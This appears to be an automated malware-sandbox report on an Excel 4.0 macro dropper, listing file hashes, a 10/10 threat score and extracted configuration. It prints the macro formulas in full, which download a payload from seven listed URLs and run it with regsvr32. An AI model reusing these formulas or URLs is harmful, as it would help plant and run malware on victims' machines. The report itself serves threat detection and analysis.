General

  • Target

    eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

  • Size

    35KB

  • Sample

    241120-3an3naweqn

  • MD5

    1553fa17f531fd2b7d2d1b76624374e1

  • SHA1

    063eda6f5c07a308df1c9f537179dba64cc7d50c

  • SHA256

    eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

  • SHA512

    704165ba1b90445cb34868eafab50e3ff3fcab6ba53a5982095244c453fd5e326a707a980dda45524b0370969a51d3b579c16e44fcf2adecf8448395752196cf

  • SSDEEP

    768:vrtDp5eCAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooNQ3:vrtlgCUOZZ1ZYpoQ/pMAIY

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/

https://brutobrasil.com.br/pdf/SSscCUKBvL/

https://mdmd.fun/wp-includes/Y00y/

https://appanwendung.com/wp-admin/dvDn7/

https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/

https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/

https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/","..\xdha.ocx",0,0)
    =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://brutobrasil.com.br/pdf/SSscCUKBvL/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://mdmd.fun/wp-includes/Y00y/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appanwendung.com/wp-admin/dvDn7/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C28<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")
    =RETURN()

Extracted

Language
xlm4.0

Source

    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/", "..\xdha.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://brutobrasil.com.br/pdf/SSscCUKBvL/", "..\xdha.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://mdmd.fun/wp-includes/Y00y/", "..\xdha.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://appanwendung.com/wp-admin/dvDn7/", "..\xdha.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/", "..\xdha.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/", "..\xdha.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/", "..\xdha.ocx")
URLs

  • xlm40.dropper: https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/
  • xlm40.dropper: https://brutobrasil.com.br/pdf/SSscCUKBvL/
  • xlm40.dropper: https://mdmd.fun/wp-includes/Y00y/
  • xlm40.dropper: https://appanwendung.com/wp-admin/dvDn7/
  • xlm40.dropper: https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/
  • xlm40.dropper: https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/
  • xlm40.dropper: https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/
